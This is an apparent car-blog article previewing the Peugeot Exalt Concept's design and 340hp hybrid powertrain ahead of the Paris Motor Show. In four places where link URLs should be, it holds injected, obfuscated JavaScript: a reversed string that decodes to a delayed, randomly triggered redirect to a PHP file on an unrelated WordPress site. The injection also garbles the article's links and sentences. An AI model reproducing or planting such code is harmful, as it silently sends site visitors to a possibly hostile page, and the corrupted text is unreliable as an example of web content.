Peugeot Exalt Concept. Lion ready to roar in Paris

Ahead of the model’s Paris Motor Show debut, Peugeot has released new ‘dynamic’ images of its $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/on-the-road/video-peugeot-exalt-concept/”>Exalt Concept, hinting at a potentially juicy direction for its ailing design department.

Unveiled in full at this year’s Beijing Motor Show (rumours abound that a China-only model could hit production), the Exalt will debut a new livery, though the ‘Shark Skin’ rear end and ‘Newspaper Wood’ finish on the inside remain intact. The former in particular is worthy on note, since the textiles used in the materials design uses ‘bio-mimicry’ to create a technical grain structure, essentially making the surface slicker and more aero efficient. Like our friend Jaws, the Exalt not only looks good, but is (hopefully) incredibly manoeuvrable.

Don’t let the coupe-like styling fool you, the Exalt – $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/on-the-road/video-peugeot-exalt-concept/”>unveiled earlier this year – is very much a five-door saloon, though the low roofline, beefed out wheel arches and bare steel finish may try to convince you otherwise. Consequently, inside you’ll find the fine leathers, carbon fibre trim and recycled material traditionally required for budding premium saloons. And – surprise, surprise – this premium build also comes complete with a hybrid powertrain, the 270hp 1.6-litre THP four-cylinder and the 50kW electric motor producing a combined 340hp, sent to the wheels via a six-speed automatic gearbox. Should be interesting to see how that works alongside a 1700kg base weight.

Whether the newboy hints at a bright future for $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/tags/peugeot/”>Peugeot’s styling department – following years of ‘meh’-esque dross boxes that proved as interesting as paint drying – remains to be seen. Let’s not forget that at last year’s event, the buzz surrounded the $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/tags/peugeot-onyx/”>then brand new Onyx…
